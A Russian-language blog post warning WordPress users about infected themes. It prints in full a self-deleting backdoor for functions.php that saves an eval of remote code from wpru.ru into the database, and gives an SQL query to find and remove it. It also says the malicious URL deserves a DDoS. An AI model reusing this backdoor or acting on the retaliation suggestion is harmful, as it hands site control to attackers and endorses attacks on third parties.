nagon.net - бесплатная поставка трафика на ваши сайты
Логин:
Пароль:
Регистрация





Убрать рекламу с сайта чтобы не мешала!

Wordpress уязвимости и взлом. На сайте появились подозрительные ссылки.

Уязвимости Wordpress, подозрительные ссылки, почему взломали сайт?



Если вы собираетесь пользоваться движком Wordpress то хочу вас огорчить.
Большинство готовых шаблонов дырявые.
А если вы уже им пользуетесь то нужно обязательно проверить его на уязвимости.

Сперва наперво нужно проверить папку с шаблоном и просмотреть исходные коды файлов.
Если в папке лежит файл functions.php просмотрите его тоже.

В нем может находится вот такой код:


//beginXX
add_action('after_setup_theme', '_theme_setup');
function _theme_setup(){
$value = 'return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=35&n'));';
add_option('blogoption', $value, '', 'yes');
//selfterminate
$functions = file_get_contents(TEMPLATEPATH.'/functions.php');
$p1 = substr($functions, 0, strpos($functions, '//beginXX'));
$p2 = end(explode('//endXX', $functions));
file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2);
}
//endXX
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}

if ( function_exists('register_sidebar') ) {
register_sidebar(array('1' => '1 - Sidebar 1'));
register_sidebar(array('2' => '2 - Sidebar 2'));
}


Это вредоносный код.
После запуска он сам себя удалит добавив параметры в базу данных.
В общем код позволяет управлять вашим сайтом как своим.

Что нужно сделать чтобы избежать потерь?

Конечно в первую очередь удалить файл functions.php

Потом нужно выполнить к базе данных запрос например через phpmyadmin:


SELECT * FROM `wp_options` WHERE `option_name` = 'blogoption';


Если запрос вернет чтото например такую строку:


return eval(file_get_contents('http://wpru.ru/aksimet.php?id='.$post->ID.'&m=35&n'));


то значит уязвимость уже находится в базе.
В общем все что вернет запрос нужно удалить.

Уязвимость находится
по адресу
wpru.ru/aksimet.php
и оттуда грузится вредоносный код, поэтому было бы справедливо подосить ссылку чтобы не повадно было.

Вас зовут:

Ваш комментарий:


Код на картинке: